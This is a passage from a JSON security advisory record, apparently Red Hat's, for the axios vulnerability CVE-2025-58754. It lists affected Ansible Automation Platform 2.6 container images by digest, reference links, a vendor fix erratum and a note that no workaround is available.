"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:7ac4a5aa9f4aedf07af022fe3592df0e4ae972796c3d228f54036d40f07cfe25_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:ea1c58c4940001e56a3ad0f5f716605c52adfbc0e36c84ed4ecfe54af9362743_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:142125ce7f176ce4d9755f3124714bbfd8e10a687378988761d5451bd135ca76_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9adedee87c7a2cbbb28ed5a3b5f17b9c7cfeb5ee4ff8df793aeb4a4f3794ac3f_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:a13732636405962dcbb3d6f6e50e9dedfaae2ff7b1a5b3c0325b2562ae5dd109_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:ade01460c7010d882979bc2b8c97c92bb6fe0c606d6dd2c131686ebf20d90b50_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:15d2b3d290e15d375ac40ec0c47f00de2a4b3e2f0dc8aa081e135a70eae72338_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:5b48bdddf275aaa65dcdc7f478baa6ee7508bb7702a2995c53a05c569afa9841_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:73b2178a84f953a63c8cbcee481b6911e193f77a7df1b17ad53a11df5409f184_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:afa286d0c0332f681e5b25160cefaaca86947efe3121bad7f9ef5c41d6e5dede_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:3a2cbe7ab27580512cf973c81ebde3fa03f74e30c1820f4878bafce5f17bdb20_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:54f4749f9b9685fd9e9e87522d64f2078dde65f196b6829cbe4ad6f64005376d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6e90b9356d0b0471e01e990081f98fff57a2bb4c3d3b6558ddca32d66f5146e3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:7ebac59134bc4c91ce9230c9f44123b480a959dff54ca374699cfbfb9bfcb8a6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:21485ddd8b92241b280978969d1567f1c4b9a8847dca5eb582dde5c3b83ce1c5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:4609656d13e0608036b64764997d727bd182fdd5b46f55da45983cb94bf6d56e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:a952ec77f30441e9d8567939d3ddf44a18723d411a3f0f9bacce4dc53db55721_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:da80b80f58c5b252fad5c8c8a7737a73672be5dfda3727d9dae867192a1992ca_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:10953fb6eb77149c5449f19b712dc47f9a699cff1662b1fab80b10e95e59d7eb_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:1c81563472c472228365a0b75d39020bdc526fef589d83c076c021be9bca07d4_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:67f54bafa057771cae48c96f6daf49c74606c805b7783d47765b7ae0fee06fdb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:caf6663c6815dd74306ca316f3b748982c5550c15abfae19bf083cdbdc301ec8_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:288219fd88218e8a99533937b1abda0211a1294ce0aa71dfb8d98fb4ac298864_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:62628bcd333089ef22600473ddf6b5acee70e1c2bbf5f1c2983e21665633a974_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:6c45d9dc22e02c136e8f1903430e85f1add5c3d66233ec0af560e4851a5aa0cd_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:a5eaaaf93a768fc5654a33a7612735697de4af3a7cf15533aeb3fbd6d2ef735f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:102451cf6511b1f59847011f2294bfbb03988e05c5252f0061d5d59e2e366ab7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:4ed0fc6b0218e1bbefb20b824680570d987975e4637b4b8bf309f1043f50ac42_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:b0d2c4a8c1f06afe52ab0b1eff3ab2e782481982edb708f3996b6ae380523ccc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:cdff41f6d52d8d2190178ad267f67054dacd9f77afff99f25b16fb24a8031236_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:09bdd457cf53397c33a08cfa248c9a88a53677650e8403c7cf8fb71a8c8fe1ce_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:780cf2fc697936935144ea82dbe6e8a420a100574cb5da06c6083181a89a3fd7_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:9301963c347cc3f67a7ff06658a938a0d2abcd810fffb1b468ac467b6bf07531_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:b6a9267895ec71a6920e44fe43a595a7861476ac7ff0ad44c79841e02070323d_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:8469d45c44fb42b40596a37088a406b89a199a5298ce9c9c527b2448757aca76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:960ff4c01e0051b1de0f9985d5e92c35ce21c13545aecadf9c412c5895f2c77a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:cc9bda507e8846425484938651d5a1a3fff17e8573434dfcec8a261fb68d7f11_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:cf18d22b6a2b25a236b960ab4f474cad8439dfd48b3da1d7f5cfdb49457c6717_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:08f6497b7039fdf75880aa6e6b76ed85101d6767a5123e0762edaf1d66aa619d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:3398c37307e6ba2dcc592e125f1abf194db50c2d29df2ef2647cb297ff7bfe7e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:360722ce74ffd759973fa3f15e30803f0ffb261e27d5c5546d5a485f424996ad_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:3e8a9664a261f1973bf768b2392553bb11d5c9a09f0631ce1537130b7fb67e86_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:4e7f88967319f7410fb6826406bb175c1a4410a049918e6c3f7548083ac1f83e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:6dc7f5723548675e39283b90cc6345b23ec4cc3db57224c9bb5732ccd51a681c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:c7fbe8aa9424816bde8e61591968d75b9436aadc33348338a21bcb19e54f585f_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:caa6bd6fa78d5d29e620a9b89e22f07b9fbe7c9793b55ebf0cdfb969cc91dc68_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:1bbb8bdf4e4245579b74a0c8a80bf85849866a286b91f053292f48a08f65d80d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:3d0853b4f0b9fb4fac9d57a18873b3b4c9a267da5a469b3bee7a5cd32c9c4b40_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:40c9b33e0165a6acf554ebea49486ab235b26600554ae14d370a2f0476105803_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:fbad0fd8701a969937246e948928c63e644748c8e2e0ce5203032957741a2e84_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:86539e1f8ad1d2ade220ebab8e80ffdda740a3a29ac51e27f7febca1dc412bae_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:99ac77ccc235297459f77ea620429d42bb0a8dd26fd41d334cc53a396232e3a3_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:aa0bfc3af0659b2c5cddfde7f7d194b05749ba517e22e131f54ab18759f2c046_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:fcbebd780563758a09022a38fbaf6d3d4b8f90a362d40c8e48020b78b81e348b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:0942386e5c666874d6a7680724651e595847de30c23260494596ffa946eb960f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:82f9a6a71433d512d3139962ac400de9a99e5a8509dd12967bc946b8efd2b262_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a816effc6382edc76b2d1ff777c109f7c5f6de9c3d15125f66106b64b5544f37_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:dd48ee4c2bfbd685a288931bcba731b7324e33cd66b5ff57b1dbec1b0c0662b8_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:0957ac2b026c05796bd1bb066559d47fbd4fe70554acaa31a55f40863f4bf345_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:3e090bc1d88a6deb3db462ea36e9e98ab5f973d50e063d37a01fa423d4cb3c5d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:c5dbef2ff58cb287a63acbadfd1bcfc12f8938f000aa7d05ac3bc9d8ccc7a062_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:c948573a88c6a6c752e8c051d9753a761d773231c46940de624397b20dc5176b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:05af0b67c8222faff9e85e80a397d81d4ceb0f99f5cbc261362080dd43db7409_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:1609aa26aaf411f44a388546cacbb6c3c41cd2cc129c03cdb89d2ef8570b0407_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:1e7f99a462dc2643327f33fcf54539798628c869c59974475ff1eccf60f04cdb_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f0e755a03078917a3add8bed575aa2d4f19bbc1c16069485cf59a2fff5fedad6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:941b3a0d97b863362a6ff3abdde6071e9b450301a46d67dfe7c1a6172bbecd6a_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:dae29680daff4810413849c1458c08d1d2bb6a07074cbd4c1eccacd109b9374c_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-58754"
},
{
"category": "external",
"summary": "RHBZ#2394735",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2394735"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-58754",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58754"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-58754",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58754"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/commit/945435fc51467303768202250debb8d4ae892593",
"url": "https://github.com/axios/axios/commit/945435fc51467303768202250debb8d4ae892593"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/pull/7011",
"url": "https://github.com/axios/axios/pull/7011"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/releases/tag/v1.12.0",
"url": "https://github.com/axios/axios/releases/tag/v1.12.0"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/security/advisories/GHSA-4hjh-wcwx-xvwj",
"url": "https://github.com/axios/axios/security/advisories/GHSA-4hjh-wcwx-xvwj"
}
],
"release_date": "2025-09-12T01:16:40.513000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-10-28T21:16:15+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6#Upgrading",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3dce912c04e50532020ef82da326f495f9a191a834c393081d6b3d2a9247f986_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:4cd246efb45ed57287e2b1178e464d0ab7fe54383283890cf36651b8a964d98d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:8c0b63347f0d33f362b47d18f234b708ff793fe9ba742184b9cf8338ab708ba5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:d60af60b04d91d194a4bbef011514bb568b04afe408615f967ea354bf9d99770_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:19221"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6234df5349999e20be07aa3c38010a3a65be0ee046773d1bca3514e208f3cf78_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:83d86c80c569a9f31196747e15d264bfc251a6674838bb6429a287d32a787459_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:c2df702889d1107e0e3af4af521e7a4e5f95e903e86841f1aa358c8dab9c60a1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:cc7e50863e30c9d063e2a565d0c458731213d1207e350c7806f43034a858ae5b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:815e697ac53fe170190a0d0cb7b97850b0d82e5e2922d3d26cb915c657cf1580_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:8fd2d13811182cef881debf6be72511b3c1bec13419b06227992870e4f73b08e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:aacbd0924a893df085378cfe45a33b2ad7decf5d73ef92ee23c9781186736438_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:cc22ae64354f0e0339b863bd9e24f03bd94a55ae29361ddc7be944a713b66766_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:533594cf53838ba60378f8e20fab01b26bf154219fcac7086aba05efbb0f2e5f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:58aecbcbd1ed707cceb107eae0c11c048c1840fcc5be1eae9172ab9a367e5a5d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8c94a0beee5e82d7de3ab1f25b4c9d9419d04f8be965896f1ed8e12e00a1c4c9_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e777c309cb46685326bf61f6cb617e8f05b5f135fd3579f3fc403a8eef902246_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:080a2749d8f069a561915ba788999a6d9a0d4641df282cf62168e63414ca0098_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:bb921be10afe800a9670670965b9df554fc03fc32d6d6619a4d2f0e80f9c32dd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:c50352c97aeccabaa290f9a33436b59c83d0fabe9047585ed7dbd1f2e02976e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:e2e6a5db64da900bb1f004f2beabd3bd578aa43a5d69051ee774918ab8d8950e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:0dc1770990eb18e29e4b5d0d6e31f76ea98b9bc553b4af38ba2fa419b260836b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:4a00012fedf458afc04d5a2c010027d3e482d9dabcb82f55d4cb479473f9d2d6_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:703c8aa650afe52683e2d15e7f6fdfbd8fc9c4e35122fe0ef551bbc14b4675c1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:89dea5d275fba916d2d988ee6b5420ac3d0e198ec0195cdf5db818f7331eaea4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:06aa0cc29ecfe0adac0b42a4a3d8a73641d2d222e3d882af86f31b547223444d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9513550a50f14bd48a45cbd2f493e79bd9b4416efb035d62699e176906c2a70e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:d34a73ba2e35682b4090373682112b5b15a232e217a13717a5dbe30ad6e0d524_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:ee7252d8265f1530bb9ad5908f9b292d348275cdb3552306f9831eb8ad3c577f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:01b7617033de7cf8a24b35a098abd34185605ab879dba4f1bb5af5777d5060c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:5195a7de6c4496dc134aac3095981534ccb352bd542c728a5d8bc86e87d5f681_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:ac4600c8d66becc731d588b718d0e6651abcd4aedea4bfac384e52266542a129_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:be9b91c9336638bfadfd88f9da08f3f343879a7d2023dd79952be9ab6882be09_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:1299a3e187dff4f23c8170e488bf5ecddd82b1de80126f4c2c919069b011f100_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:69d9574df2c7d58e17db96bb3f1f6fbef45b8756dc311cefbb11eac1c5687623_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:7ac4a5aa9f4aedf07af022fe3592df0e4ae972796c3d228f54036d40f07cfe25_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:ea1c58c4940001e56a3ad0f5f716605c52adfbc0e36c84ed4ecfe54af9362743_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:142125ce7f176ce4d9755f3124714bbfd8e10a687378988761d5451bd135ca76_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9adedee87c7a2cbbb28ed5a3b5f17b9c7cfeb5ee4ff8df793aeb4a4f3794ac3f_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:a13732636405962dcbb3d6f6e50e9dedfaae2ff7b1a5b3c0325b2562ae5dd109_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:ade01460c7010d882979bc2b8c97c92bb6fe0c606d6dd2c131686ebf20d90b50_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:15d2b3d290e15d375ac40ec0c47f00de2a4b3e2f0dc8aa081e135a70eae72338_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:5b48bdddf275aaa65dcdc7f478baa6ee7508bb7702a2995c53a05c569afa9841_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:73b2178a84f953a63c8cbcee481b6911e193f77a7df1b17ad53a11df5409f184_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:afa286d0c0332f681e5b25160cefaaca86947efe3121bad7f9ef5c41d6e5dede_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:3a2cbe7ab27580512cf973c81ebde3fa03f74e30c1820f4878bafce5f17bdb20_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:54f4749f9b9685fd9e9e87522d64f2078dde65f196b6829cbe4ad6f64005376d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6e90b9356d0b0471e01e990081f98fff57a2bb4c3d3b6558ddca32d66f5146e3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:7ebac59134bc4c91ce9230c9f44123b480a959dff54ca374699cfbfb9bfcb8a6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:21485ddd8b92241b280978969d1567f1c4b9a8847dca5eb582dde5c3b83ce1c5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:4609656d13e0608036b64764997d727bd182fdd5b46f55da45983cb94bf6d56e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:a952ec77f30441e9d8567939d3ddf44a18723d411a3f0f9bacce4dc53db55721_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:da80b80f58c5b252fad5c8c8a7737a73672be5dfda3727d9dae867192a1992ca_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:10953fb6eb77149c5449f19b712dc47f9a699cff1662b1fab80b10e95e59d7eb_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:1c81563472c472228365a0b75d39020bdc526fef589d83c076c021be9bca07d4_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:67f54bafa057771cae48c96f6daf49c74606c805b7783d47765b7ae0fee06fdb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:caf6663c6815dd74306ca316f3b748982c5550c15abfae19bf083cdbdc301ec8_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:288219fd88218e8a99533937b1abda0211a1294ce0aa71dfb8d98fb4ac298864_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:62628bcd333089ef22600473ddf6b5acee70e1c2bbf5f1c2983e21665633a974_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:6c45d9dc22e02c136e8f1903430e85f1add5c3d66233ec0af560e4851a5aa0cd_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:a5eaaaf93a768fc5654a33a7612735697de4af3a7cf15533aeb3fbd6d2ef735f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3dce912c04e50532020ef82da326f495f9a191a834c393081d6b3d2a9247f986_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:4cd246efb45ed57287e2b1178e464d0ab7fe54383283890cf36651b8a964d98d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:8c0b63347f0d33f362b47d18f234b708ff793fe9ba742184b9cf8338ab708ba5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:d60af60b04d91d194a4bbef011514bb568b04afe408615f967ea354bf9d99770_amd64",
